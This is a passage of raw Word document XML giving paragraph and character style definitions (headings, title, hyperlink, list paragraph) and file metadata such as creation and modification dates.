    <w:rsid w:val="70E701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eastAsia="Times New Roman" w:cs="Times New Roman"/>
      <w:color w:val="3A3A3A"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="2">
    <w:name w:val="heading 1"/>
    <w:next w:val="1"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:spacing w:before="200" w:after="100"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="1B3A6B"/>
      <w:sz w:val="30"/>
      <w:szCs w:val="30"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="3">
    <w:name w:val="heading 2"/>
    <w:next w:val="1"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:spacing w:before="200" w:after="80"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="1B3A6B"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="4">
    <w:name w:val="heading 3"/>
    <w:next w:val="1"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:spacing w:before="200" w:after="80"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="0D7377"/>
      <w:sz w:val="23"/>
      <w:szCs w:val="23"/>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Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
      <w:color w:val="3A3A3A"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="12">
    <w:name w:val="Hyperlink"/>
    <w:unhideWhenUsed/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:color w:val="0563C1"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="13">
    <w:name w:val="Title"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
      <w:color w:val="3A3A3A"/>
      <w:sz w:val="56"/>
      <w:szCs w:val="56"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="14">
    <w:name w:val="List Paragraph"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
      <w:color w:val="3A3A3A"/>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8</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2026-03-22T07:38:00Z</dcterms:created>
  <dc:creator>Un-named</dc:creator>
  <cp:lastModifiedBy>Noel Biju John</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-03-22T07:49:09Z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3BBDD2FAEFFE4DFFB34B1F6AFCE3A2E6_12</vt:lpwstr>
  </property>
</Properties>
</file>